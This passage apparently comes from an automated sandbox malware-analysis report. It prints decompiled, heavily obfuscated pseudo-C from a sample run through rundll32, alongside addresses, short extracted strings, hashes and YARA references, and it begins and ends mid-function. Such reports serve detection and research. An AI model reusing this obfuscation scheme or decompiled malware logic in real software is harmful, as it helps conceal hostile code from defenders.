				_v56 = _v56 + 0xca5f;
				_v56 = _v56 ^ 0x000097d2;
				_v60 = 0x67db;
				_v60 = _v60 + 0xffff6270;
				_v60 = _v60 ^ 0xc598274b;
				_v60 = _v60 ^ 0x3a67f21b;
				_v24 = 0x2803;
				_v24 = _v24 ^ 0x5736d0c5;
				_v24 = _v24 ^ 0x5736adce;
				_v28 = 0x6556;
				_v28 = _v28 ^ 0x16a4143a;
				_v28 = _v28 ^ 0x16a44fe2;
				_v64 = 0x2652;
				_v64 = _v64 << 1;
				_v64 = _v64 * 0x60;
				_v64 = _v64 ^ 0x001ca86e;
				_v116 = 0xa093;
				_v116 = _v116 | 0x704eabb3;
				_v116 = _v116 >> 0xe;
				_t296 = 0x26;
				_v116 = _v116 * 0x25;
				_v116 = _v116 ^ 0x0040c4bc;
				_v80 = 0xb33b;
				_v80 = _v80 >> 6;
				_v80 = _v80 >> 0xd;
				_v80 = _v80 ^ 0x000057d5;
				_v120 = 0xdf18;
				_v120 = _v120 | 0xefceebfd;
				_v120 = _v120 + 0xf560;
				_v120 = _v120 ^ 0xefcfb7f2;
				_v84 = 0x84bb;
				_v84 = _v84 ^ 0xda107d20;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x10f9b229;
				_v68 = 0xeff9;
				_v68 = _v68 / _t296;
				_v68 = _v68 >> 0x10;
				_v68 = _v68 ^ 0x00000bea;
				_v100 = 0x20d7;
				_v100 = _v100 >> 3;
				_t297 = 0x59;
				_v100 = _v100 * 0x53;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00004dbe;
				_v104 = 0x1634;
				_v104 = _v104 | 0xa08b3358;
				_v104 = _v104 * 0x64;
				_v104 = _v104 | 0xcfa784de;
				_v104 = _v104 ^ 0xffe789e4;
				_v108 = 0x3cd;
				_v108 = _v108 | 0xda478b90;
				_v108 = _v108 ^ 0x76068ebd;
				_v108 = _v108 * 0x60;
				_v108 = _v108 ^ 0x986216c6;
				_v112 = 0x5ea3;
				_v112 = _v112 * 0x50;
				_v112 = _v112 / _t297;
				_v112 = _v112 >> 6;
				_v112 = _v112 ^ 0x0000527a;
				_v32 = 0x8038;
				_v32 = _v32 + 0xffff845e;
				_v32 = _v32 ^ 0x00005668;
				_v72 = 0x3956;
				_v72 = _v72 ^ 0xc34d822a;
				_v72 = _v72 | 0x19b55510;
				_v72 = _v72 ^ 0xdbfdff55;
				_v36 = 0x9b67;
				_v36 = _v36 >> 5;
				_v36 = _v36 ^ 0x00004f8e;
				_v76 = 0x4339;
				_v76 = _v76 + 0xfffff79c;
				_v76 = _v76 + 0x9b18;
				_v76 = _v76 ^ 0x00009e95;
				while(1) {
					_t268 = _v48;
					while(1) {
						L2:
						_t327 = _t319 - 0x26339395;
						if(_t327 > 0) {
							break;
						}
						if(_t327 == 0) {
							_push(_t297);
							E001F5B05(_v68,  *((intOrPtr*)( *0x2121b4 + 0x14)), _t297, _v8, _v100, _v104, _t297, _v108, _v112, _v32, _v12);
							_t324 =  &(_t324[0xa]);
							_t297 = 1;
							_t319 = 0x1081595e;
							_t292 =  !=  ? 1 : _t292;
							while(1) {
								_t268 = _v48;
								goto L2;
							}
						}
						if(_t319 == 0xc83da09) {
							_t319 = 0x357aa1fe;
							continue;
						}
						if(_t319 == 0x1081595e) {
							E001FD7B0(_v12);
							_t297 = _t297;
							_t319 = 0x172012b8;
							while(1) {
								_t268 = _v48;
								goto L2;
							}
						}
						if(_t319 == 0x16b83fff) {
							_t319 = 0x2f4aaa5a;
							continue;
						}
						if(_t319 == 0x172012b8) {
							if(_t292 == 0) {
								E001F91CD(_v88, _v92, _v40,  *_t318, _v44);
							}
							L29:
							return _t292;
						}
						if(_t319 != 0x24206dd0) {
							L25:
							if(_t319 == 0x2ef876fe) {
								goto L29;
							}
							while(1) {
								_t268 = _v48;
								goto L2;
							}
						}
						E001F1BB6(_t318 + 4, _v116, _t297,  *_t318, _v12, _v80,  *((intOrPtr*)( *0x2121b4)), _v120, _v84);
						_t324 =  &(_t324[8]);
						asm("sbb esi, esi");
						_t319 = (_t319 & 0x15b23a37) + 0x1081595e;
						while(1) {
							_t268 = _v48;
							goto L2;
						}
					}
					if(_t319 == 0x2f4aaa5a) {
						 *((intOrPtr*)(_t318 + 4)) = _a4 - 0x74;
						_t273 = E002057E8( *((intOrPtr*)(_t318 + 4)));
						 *_t318 = _t273;
						_t297 = _t297;
						if(_t273 == 0) {
							_t319 = 0x2ef876fe;
							goto L25;
						}
						_t275 =  *_t322;
						_t319 = 0x357ef6c4;
						_v8 = _t275;
						_v4 = _t275 + 0x74;
						_t268 = _a4 - 0x74;
						_v48 = _a4 - 0x74;
						goto L2;
					}
					if(_t319 == 0x357aa1fe) {
						if(_a4 < 0x74) {
							goto L29;
						}
						_t319 = 0x16b83fff;
						goto L2;
					}
					if(_t319 == 0x357ef6c4) {
						_t297 = _v20;
						E001FCB42(_t297, _v52, _v56, _t297,  &_v12,  *((intOrPtr*)( *0x2121b4 + 0x10)), _t297, _v60);
						_t324 =  &(_t324[6]);
						asm("sbb esi, esi");
						_t319 = (_t319 & 0x23df12f3) + 0x172012b8;
						while(1) {
							_t268 = _v48;
							goto L2;
						}
					}
					if(_t319 != 0x3aff25ab) {
						goto L25;
					}
					_t297 = _v24;
					E001F9970(_t297, _v4, _v28,  *_t318, _t268, _v64);
					_t324 =  &(_t324[4]);
					_t319 = 0x24206dd0;
				}
			}

0x001fc084
0x001fc08b
0x001fc08d
0x001fc08f
0x001fc096
0x001fc097
0x001fc098
0x001fc09d
0x001fc0a8
0x001fc0ab
0x001fc0b2
0x001fc0ba
0x001fc0bc
0x001fc0c4
0x001fc0c9
0x001fc0ce
0x001fc0d3
0x001fc0db
0x001fc0e3
0x001fc0f2
0x001fc0f5
0x001fc0fe
0x001fc102
0x001fc10a
0x001fc112
0x001fc11a
0x001fc11f
0x001fc124
0x001fc12c
0x001fc134
0x001fc13c
0x001fc141
0x001fc149
0x001fc151
0x001fc15e
0x001fc162
0x001fc16a
0x001fc172
0x001fc17a
0x001fc182
0x001fc18a
0x001fc192
0x001fc19f
0x001fc1a3
0x001fc1ab
0x001fc1b7
0x001fc1ba
0x001fc1be
0x001fc1c6
0x001fc1ce
0x001fc1d6
0x001fc1de
0x001fc1e6
0x001fc1ee
0x001fc1f6
0x001fc1fe
0x001fc206
0x001fc20e
0x001fc216
0x001fc21e
0x001fc226
0x001fc22f
0x001fc233
0x001fc23b
0x001fc243
0x001fc24b
0x001fc259
0x001fc25c
0x001fc260
0x001fc268
0x001fc270
0x001fc275
0x001fc27a
0x001fc282
0x001fc28a
0x001fc292
0x001fc29a
0x001fc2a2
0x001fc2aa
0x001fc2b2
0x001fc2b7
0x001fc2bf
0x001fc2cf
0x001fc2d3
0x001fc2d8
0x001fc2e0
0x001fc2e8
0x001fc2f2
0x001fc2f3
0x001fc2f7
0x001fc2fc
0x001fc304
0x001fc30c
0x001fc319
0x001fc31d
0x001fc325
0x001fc32d
0x001fc335
0x001fc33d
0x001fc34a
0x001fc34e
0x001fc356
0x001fc363
0x001fc36d
0x001fc371
0x001fc376
0x001fc37e
0x001fc386
0x001fc38e
0x001fc396
0x001fc39e
0x001fc3a6
0x001fc3ae
0x001fc3b6
0x001fc3be
0x001fc3c3
0x001fc3cb
0x001fc3d3
0x001fc3db
0x001fc3e3
0x001fc3eb
0x001fc3eb
0x001fc3ef
0x001fc3ef
0x001fc3ef
0x001fc3f5
0x00000000
0x00000000
0x001fc3fb
0x001fc4af
0x001fc4e1
0x001fc4e8
0x001fc4eb
0x001fc4ec
0x001fc4f3
0x001fc3eb
0x001fc3eb
0x00000000
0x001fc3eb
0x001fc3eb
0x001fc407
0x001fc4a5
0x00000000
0x001fc4a5
0x001fc413
0x001fc494
0x001fc49a
0x001fc49b
0x001fc3eb
0x001fc3eb
0x00000000
0x001fc3eb
0x001fc3eb
0x001fc41b
0x001fc476
0x00000000
0x001fc476
0x001fc423
0x001fc605
0x001fc619
0x001fc61e
0x001fc624
0x001fc62a
0x001fc62a
0x001fc42f
0x001fc5f6
0x001fc5fc
0x00000000
0x00000000
0x001fc3eb
0x001fc3eb
0x00000000
0x001fc3eb
0x001fc3eb
0x001fc459
0x001fc45e
0x001fc463
0x001fc46b
0x001fc3eb
0x001fc3eb
0x00000000
0x001fc3eb
0x001fc3eb
0x001fc501
0x001fc5ae
0x001fc5bd
0x001fc5c2
0x001fc5c4
0x001fc5c7
0x001fc5f1
0x00000000
0x001fc5f1
0x001fc5c9
0x001fc5cc
0x001fc5d1
0x001fc5db
0x001fc5e5
0x001fc5e8
0x00000000
0x001fc5e8
0x001fc50d
0x001fc598
0x00000000
0x00000000
0x001fc59e
0x00000000
0x001fc59e
0x001fc519
0x001fc570
0x001fc577
0x001fc57c
0x001fc581
0x001fc589
0x001fc3eb
0x001fc3eb
0x00000000
0x001fc3eb
0x001fc3eb
0x001fc521
0x00000000
0x00000000
0x001fc539
0x001fc540
0x001fc545
0x001fc548
0x001fc548

Strings

R&, xrefs: 001FC21E
o, xrefs: 001FC172
9C, xrefs: 001FC3CB
zR, xrefs: 001FC376
V9, xrefs: 001FC396
hV, xrefs: 001FC38E
2, xrefs: 001FC134
E2, xrefs: 001FC112
Ve, xrefs: 001FC206
iv, xrefs: 001FC09D

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2$9C$E2$R&$V9$Ve$hV$iv$zR$o
API String ID: 0-2458788695
Opcode ID: 721933bfd3a09b2c73a4f712e1d7ceff44a12a942abfbc3e725ffec4679a41b0
Instruction ID: dd4b010d64b1d6ac0085fc3000e6c9c2eff50e57367203322b70aa5cfd5ea7cc
Opcode Fuzzy Hash: 721933bfd3a09b2c73a4f712e1d7ceff44a12a942abfbc3e725ffec4679a41b0
Instruction Fuzzy Hash: 92E1507240C385DFD358CF68C98A82BBBF0BB84758F60891DF69586260D7B19948CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00205DAA, Relevance: 12.8, Strings: 10, Instructions: 290
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00205DAA(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				unsigned int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				void* _t312;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t330;
				void* _t335;
				void* _t337;
				void* _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				intOrPtr _t365;
				void* _t366;
				signed int* _t368;
				void* _t376;

				_t368 =  &_v144;
				_v16 = 0x2f11e5;
				_v12 = 0x125d40;
				_t365 = 0;
				_t338 = __ecx;
				_v8 = 0;
				_t366 = 0x358f7696;
				_v4 = 0;
				_v132 = 0xdcb7;
				_t340 = 0x6f;
				_v132 = _v132 / _t340;
				_t341 = 0x48;
				_v132 = _v132 / _t341;
				_v132 = _v132 + 0xfffff0ee;
				_v132 = _v132 ^ 0xffff84cc;
				_v28 = 0x3643;
				_v28 = _v28 + 0xffff4038;
				_v28 = _v28 ^ 0xffff36c8;
				_v84 = 0x2397;
				_v84 = _v84 ^ 0x715e3b83;
				_v84 = _v84 + 0xb2b;
				_v84 = _v84 ^ 0x715e6259;
				_v92 = 0x7fa0;
				_t342 = 0xd;
				_v92 = _v92 * 0x4c;
				_v92 = _v92 | 0x3035aed7;
				_v92 = _v92 ^ 0x3035c4a3;
				_v32 = 0x3c7c;
				_v32 = _v32 << 0xd;
				_v32 = _v32 ^ 0x078f867d;
				_v124 = 0xd3cb;
				_v124 = _v124 << 0xa;
				_v124 = _v124 / _t342;
				_v124 = _v124 << 3;
				_v124 = _v124 ^ 0x020946e5;
				_v68 = 0x8f72;
				_t343 = 0x68;
				_v68 = _v68 / _t343;
				_v68 = _v68 * 0x26;
				_v68 = _v68 ^ 0x00002cf4;
				_v76 = 0xb700;
				_v76 = _v76 >> 0xf;
				_v76 = _v76 | 0x3f1719c8;
				_v76 = _v76 ^ 0x3f176b52;
				_v80 = 0x2c59;
				_v80 = _v80 | 0xf2308069;
				_v80 = _v80 ^ 0x9e8457c3;
				_v80 = _v80 ^ 0x6cb4c9eb;
				_v128 = 0xbaba;
				_v128 = _v128 | 0x1d3dda76;
				_v128 = _v128 ^ 0x5e21119f;
				_v128 = _v128 + 0xffffe525;
				_v128 = _v128 ^ 0x431cc63a;
				_v72 = 0xdca3;
				_v72 = _v72 * 0x15;
				_v72 = _v72 * 0x47;
				_v72 = _v72 ^ 0x05054403;
				_v88 = 0x680b;
				_v88 = _v88 ^ 0xdb65b47e;
				_v88 = _v88 + 0xffff3c9f;
				_v88 = _v88 ^ 0xdb654b07;
				_v40 = 0xa6e8;
				_t344 = 0x51;
				_v40 = _v40 * 0x47;
				_v40 = _v40 ^ 0x002e2907;
				_v48 = 0xe244;
				_v48 = _v48 + 0xe070;
				_v48 = _v48 ^ 0x0001a9ff;
				_v52 = 0xb9c7;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x000022fe;
				_v36 = 0xc27e;
				_v36 = _v36 * 0x12;
				_v36 = _v36 ^ 0x000dd66f;
				_v120 = 0xc6aa;
				_v120 = _v120 | 0x840c2d9c;
				_v120 = _v120 << 5;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x3beff1bc;
				_v64 = 0x26b9;
				_v64 = _v64 * 0x17;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 ^ 0x0000525e;
				_v136 = 0x331a;
				_v136 = _v136 ^ 0xe6942da9;
				_v136 = _v136 / _t344;
				_v136 = _v136 + 0x45e7;
				_v136 = _v136 ^ 0x02d904bd;
				_v60 = 0xefe2;
				_v60 = _v60 ^ 0xb768827f;
				_t345 = 0x5a;
				_v60 = _v60 / _t345;
				_v60 = _v60 ^ 0x0209f4de;
				_v44 = 0x996d;
				_v44 = _v44 + 0xeb77;
				_v44 = _v44 ^ 0x0001ce3e;
				_v140 = 0xaea2;
				_v140 = _v140 + 0xffff7943;
				_v140 = _v140 + 0xffff713c;
				_v140 = _v140 << 1;
				_v140 = _v140 ^ 0xffff0950;
				_v144 = 0xe8a6;
				_v144 = _v144 + 0xffff5365;
				_v144 = _v144 << 9;
				_v144 = _v144 + 0xffffbb33;
				_v144 = _v144 ^ 0x0077ca81;
				_v104 = 0x7543;
				_v104 = _v104 + 0xd62a;
				_v104 = _v104 | 0x34ced3cc;
				_v104 = _v104 ^ 0x34cfd1d4;
				_v96 = 0x479b;
				_v96 = _v96 >> 3;
				_v96 = _v96 * 0x1b;
				_v96 = _v96 ^ 0x0000f726;
				_v20 = 0xd19;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00019a3d;
				_v112 = 0x2f15;
				_v112 = _v112 ^ 0x9e3db849;
				_v112 = _v112 >> 9;
				_v112 = _v112 * 0x50;
				_v112 = _v112 ^ 0x18b9e394;
				_v56 = 0xf91;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x003e129f;
				_v108 = 0x8d56;
				_v108 = _v108 << 0xf;
				_v108 = _v108 ^ 0xf3b2534b;
				_v108 = _v108 >> 0x10;
				_v108 = _v108 ^ 0x0000885e;
				_v116 = 0x58ab;
				_v116 = _v116 ^ 0x39457795;
				_v116 = _v116 << 7;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 ^ 0x0028ab23;
				_v24 = 0xe1b7;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x0386d299;
				_v100 = 0x8399;
				_v100 = _v100 ^ 0xb4057ac8;
				_v100 = _v100 ^ 0x810196d4;
				_v100 = _v100 ^ 0x3504142b;
				goto L1;
				do {
					while(1) {
						L1:
						_t376 = _t366 - 0x1f0dfb0b;
						if(_t376 > 0) {
							break;
						}
						if(_t376 == 0) {
							_t320 = E001F7544(_v44, _v140, _v144, _t338 + 0x18, _v104);
							_t368 =  &(_t368[3]);
							_t366 = 0x177163fa;
							_t365 = _t365 + _t320;
							continue;
						} else {
							if(_t366 == 0x5c5105d) {
								_t365 = _t365 + E001F7E30();
							} else {
								if(_t366 == 0xe774bfd) {
									_t330 = E001F7E30();
									_t368 = _t368 - 0xc + 0xc;
									_t366 = 0x24a30213;
									_t365 = _t365 + _t330;
									continue;
								} else {
									if(_t366 == 0x1438015d) {
										_t335 = E001F7E30();
										_t368 = _t368 - 0xc + 0xc;
										_t366 = 0x1f0dfb0b;
										_t365 = _t365 + _t335;
										continue;
									} else {
										if(_t366 != 0x177163fa) {
											goto L19;
										} else {
											_t337 = E001F7544(_v96, _v20, _v112, _t338 + 0x20, _v56);
											_t368 =  &(_t368[3]);
											_t366 = 0x5c5105d;
											_t365 = _t365 + _t337;
											continue;
										}
									}
								}
							}
						}
						L22:
						return _t365;
					}
					if(_t366 == 0x21c96020) {
						_t312 = E001F7E30();
						_t368 = _t368 - 0xc + 0xc;
						_t366 = 0xe774bfd;
						_t365 = _t365 + _t312;
						goto L19;
					} else {
						if(_t366 == 0x24a30213) {
							_t317 = E001F7E30();
							_t368 = _t368 - 0xc + 0xc;
							_t366 = 0x1438015d;
							_t365 = _t365 + _t317;
							goto L1;
						} else {
							if(_t366 == 0x25585055) {
								_t318 = E001F7544(_v132, _v28, _v84, _t338, _v92);
								_t368 =  &(_t368[3]);
								_t366 = 0x21c96020;
								_t365 = _t365 + _t318;
								goto L1;
							} else {
								if(_t366 != 0x358f7696) {
									goto L19;
								} else {
									_t366 = 0x25585055;
									goto L1;
								}
							}
						}
					}
					goto L22;
					L19:
				} while (_t366 != 0xd1eac77);
				goto L22;
			}

0x00205daa
0x00205db0
0x00205dbd
0x00205dce
0x00205dd0
0x00205dd2
0x00205dd9
0x00205dde
0x00205de5
0x00205df1
0x00205df6
0x00205e00
0x00205e05
0x00205e0b
0x00205e13
0x00205e1b
0x00205e26
0x00205e31
0x00205e3c
0x00205e44
0x00205e4c
0x00205e54
0x00205e5c
0x00205e69
0x00205e6c
0x00205e70
0x00205e78
0x00205e80
0x00205e8b
0x00205e93
0x00205e9e
0x00205ea6
0x00205eb3
0x00205eb7
0x00205ebc
0x00205ec4
0x00205ed0
0x00205ed3
0x00205edc
0x00205ee0
0x00205ee8
0x00205ef0
0x00205ef5
0x00205efd
0x00205f05
0x00205f0d
0x00205f15
0x00205f1d
0x00205f25
0x00205f2d
0x00205f35
0x00205f3d
0x00205f45
0x00205f4d
0x00205f5a
0x00205f63
0x00205f67
0x00205f6f
0x00205f77
0x00205f81
0x00205f89
0x00205f91
0x00205fa0
0x00205fa3
0x00205fa7
0x00205faf
0x00205fb7
0x00205fbf
0x00205fc7
0x00205fcf
0x00205fd3
0x00205fdb
0x00205fee
0x00205ff5
0x00206000
0x00206008
0x00206010
0x00206015
0x0020601a
0x00206022
0x0020602f
0x00206033
0x00206038
0x00206040
0x00206048
0x00206058
0x0020605c
0x00206064
0x0020606c
0x00206074
0x00206080
0x00206083
0x00206087
0x0020608f
0x00206097
0x0020609f
0x002060a7
0x002060af
0x002060b7
0x002060bf
0x002060c3
0x002060cb
0x002060d3
0x002060db
0x002060e0
0x002060e8
0x002060f0
0x002060f8
0x00206100
0x00206108
0x00206110
0x00206118
0x00206122
0x00206126
0x0020612e
0x00206139
0x00206141
0x0020614c
0x00206154
0x0020615c
0x00206166
0x0020616a
0x00206172
0x0020617a
0x0020617f
0x00206187
0x0020618f
0x00206199
0x002061a1
0x002061a6
0x002061ae
0x002061b6
0x002061be
0x002061c3
0x002061c8
0x002061d0
0x002061db
0x002061e3
0x002061ee
0x002061f6
0x002061fe
0x00206206
0x00206206
0x0020620e
0x0020620e
0x0020620e
0x0020620e
0x00206210
0x00000000
0x00000000
0x00206216
0x002062cb
0x002062d0
0x002062d3
0x002062d8
0x00000000
0x0020621c
0x00206222
0x002063b0
0x00206228
0x0020622e
0x002062a0
0x002062a5
0x002062a8
0x002062ad
0x00000000
0x00206230
0x00206236
0x0020627f
0x00206284
0x00206287
0x00206289
0x00000000
0x00206238
0x0020623e
0x00000000
0x00206244
0x0020625b
0x00206260
0x00206263
0x00206268
0x00000000
0x00206268
0x0020623e
0x00206236
0x0020622e
0x00206222
0x002063b2
0x002063be
0x002063be
0x002062e5
0x00206375
0x0020637a
0x0020637d
0x00206382
0x00000000
0x002062e7
0x002062ed
0x0020634b
0x00206350
0x00206353
0x00206358
0x00000000
0x002062ef
0x002062f5
0x00206321
0x00206326
0x00206329
0x0020632e
0x00000000
0x002062f7
0x002062fd
0x00000000
0x00206303
0x00206303
0x00000000
0x00206303
0x002062fd
0x002062f5
0x002062ed
0x00000000
0x00206384
0x00206384
0x00000000

Strings

Cu, xrefs: 002060F0
UPX%, xrefs: 00206303
UPX%, xrefs: 002062EF
C6, xrefs: 00205E1B
w, xrefs: 00206097
|<, xrefs: 00205E80
Y,, xrefs: 00205F05
Yb^q, xrefs: 00205E54
E, xrefs: 0020605C
^R, xrefs: 00206038

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: C6$Cu$UPX%$UPX%$Y,$Yb^q$^R$w$|<$E
API String ID: 0-937103397
Opcode ID: 867b8cbbaa225e8eb667e3060bb1b8e4f354686b956b7512de0d7884d6bc3c21
Instruction ID: 0a612f0b8012044357a5a7075bd679017eb8da15165ab54045b60127b353f37d
Opcode Fuzzy Hash: 867b8cbbaa225e8eb667e3060bb1b8e4f354686b956b7512de0d7884d6bc3c21
Instruction Fuzzy Hash: 5FE112724083818FD3A4CF64D48954BFBF1BBC4748F108A2DF5EA962A1D7B49959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 002A531E, Relevance: 12.8, Strings: 10, Instructions: 290COMMON

Download Yara Rule

Strings

|<, xrefs: 002A53F4
C6, xrefs: 002A538F
E, xrefs: 002A55D0
Cu, xrefs: 002A5664
Y,, xrefs: 002A5479
UPX%, xrefs: 002A5877
UPX%, xrefs: 002A5863
^R, xrefs: 002A55AC
Yb^q, xrefs: 002A53C8
w, xrefs: 002A560B

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: C6$Cu$UPX%$UPX%$Y,$Yb^q$^R$w$|<$E
API String ID: 0-937103397
Opcode ID: 867b8cbbaa225e8eb667e3060bb1b8e4f354686b956b7512de0d7884d6bc3c21
Instruction ID: 748fbe376372199f99f9f7186c6eae791aedba089fc1a5fedc9f8a4b81f32d64
Opcode Fuzzy Hash: 867b8cbbaa225e8eb667e3060bb1b8e4f354686b956b7512de0d7884d6bc3c21
Instruction Fuzzy Hash: E0E122724083818FD364CF68D48960BFBF1BBC4758F508A2DF5DA96260DBB89959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 002AA972, Relevance: 12.7, Strings: 10, Instructions: 209COMMON

Download Yara Rule

Strings

Xp, xrefs: 002AAA7B
&T, xrefs: 002AAAF9
., xrefs: 002AAA29
Uo8@, xrefs: 002AA9E6
X8, xrefs: 002AAB63
{>, xrefs: 002AA999
7H, xrefs: 002AABAD
82, xrefs: 002AAA46
|(, xrefs: 002AAAD9
B,33, xrefs: 002AAC4D

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &T$7H$82$B,33$Uo8@$X8$Xp${>$|($.
API String ID: 0-3351676463
Opcode ID: b00e03b0c062bf92515ad6cee3d462cf19e3914b9f7293fc340667865214705f
Instruction ID: a00f6aaca291780cd90a04d6106c378d3efd59de4b71419450b3fe75893cd7f6
Opcode Fuzzy Hash: b00e03b0c062bf92515ad6cee3d462cf19e3914b9f7293fc340667865214705f
Instruction Fuzzy Hash: 6FA141B15183819FE398CF24D88981BBBF1BFC5368F10891DF586962A0D7B58A59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002037F4, Relevance: 11.5, Strings: 9, Instructions: 244
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E002037F4() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				void* _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				void* _t242;
				signed int _t247;
				void* _t249;
				void* _t250;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t278;
				signed int _t281;
				void* _t282;
				void* _t287;
				signed int* _t289;
				void* _t297;

				_t289 =  &_v684;
				_v580 = 0x2c23da;
				asm("stosd");
				_t250 = 0;
				_t252 = 0x3c;
				asm("stosd");
				_t282 = 0x19809088;
				asm("stosd");
				_v640 = 0xf0d1;
				_v640 = _v640 << 2;
				_v640 = _v640 | 0x5b158a51;
				_v640 = _v640 ^ 0x5b17cbd5;
				_v596 = 0xd18a;
				_v596 = _v596 * 0x68;
				_v596 = _v596 ^ 0x00552011;
				_v624 = 0x272d;
				_v624 = _v624 / _t252;
				_v624 = _v624 ^ 0x00001784;
				_v644 = 0xc09;
				_v644 = _v644 << 8;
				_v644 = _v644 | 0xf1f4736a;
				_v644 = _v644 ^ 0xf1fc5cf6;
				_v616 = 0xc6c6;
				_v616 = _v616 + 0xffff298f;
				_v616 = _v616 ^ 0xffff9aa4;
				_v664 = 0x880f;
				_v664 = _v664 >> 0xd;
				_v664 = _v664 + 0xfac7;
				_v664 = _v664 ^ 0x0000c275;
				_v632 = 0x6cb7;
				_v632 = _v632 + 0x71ae;
				_v632 = _v632 ^ 0xf12e281f;
				_v632 = _v632 ^ 0xf12e892c;
				_v648 = 0x35dc;
				_t253 = 0x11;
				_v648 = _v648 / _t253;
				_v648 = _v648 ^ 0x6afc1010;
				_v648 = _v648 ^ 0x6afc6648;
				_v592 = 0xf9c9;
				_v592 = _v592 + 0xdff3;
				_v592 = _v592 ^ 0x0001b583;
				_v680 = 0x7b8d;
				_t254 = 3;
				_v680 = _v680 * 0x34;
				_v680 = _v680 >> 0x10;
				_v680 = _v680 << 0xe;
				_v680 = _v680 ^ 0x00063d51;
				_v604 = 0xd1fb;
				_v604 = _v604 / _t254;
				_v604 = _v604 ^ 0x000016e7;
				_v600 = 0x6d4a;
				_v600 = _v600 | 0xe95b5ca0;
				_v600 = _v600 ^ 0xe95b5d58;
				_v656 = 0xa6d5;
				_v656 = _v656 * 0x2c;
				_v656 = _v656 ^ 0x2fdaf6b8;
				_v656 = _v656 ^ 0x2fc61d34;
				_v636 = 0x2da6;
				_t255 = 0x61;
				_v636 = _v636 / _t255;
				_v636 = _v636 << 0xf;
				_v636 = _v636 ^ 0x003c31b2;
				_v620 = 0x6f0c;
				_v620 = _v620 + 0x94cb;
				_v620 = _v620 ^ 0x00015a96;
				_v608 = 0x32b0;
				_v608 = _v608 + 0x3f32;
				_v608 = _v608 ^ 0x00007dd4;
				_v684 = 0x29d;
				_v684 = _v684 + 0xad7f;
				_v684 = _v684 | 0x819b4d84;
				_t256 = 0x72;
				_v684 = _v684 / _t256;
				_v684 = _v684 ^ 0x012311d1;
				_v660 = 0x64d5;
				_v660 = _v660 | 0xb65d9e9f;
				_v660 = _v660 + 0xffff3959;
				_v660 = _v660 ^ 0xb65d035f;
				_v612 = 0x140;
				_v612 = _v612 >> 0xf;
				_v612 = _v612 ^ 0x00002c68;
				_v676 = 0xfbaa;
				_v676 = _v676 >> 8;
				_v676 = _v676 + 0x1669;
				_v676 = _v676 ^ 0x03abbef6;
				_v676 = _v676 ^ 0x03ab9f96;
				_v628 = 0xebed;
				_v628 = _v628 + 0x7cae;
				_t257 = 0x47;
				_t281 = _v624;
				_v628 = _v628 * 0x47;
				_v628 = _v628 ^ 0x006452eb;
				_v672 = 0xe594;
				_v672 = _v672 >> 0xc;
				_v672 = _v672 / _t257;
				_v672 = _v672 | 0x6c4d1fae;
				_v672 = _v672 ^ 0x6c4d687d;
				_v668 = 0x6152;
				_v668 = _v668 >> 0xa;
				_v668 = _v668 | 0x4751a645;
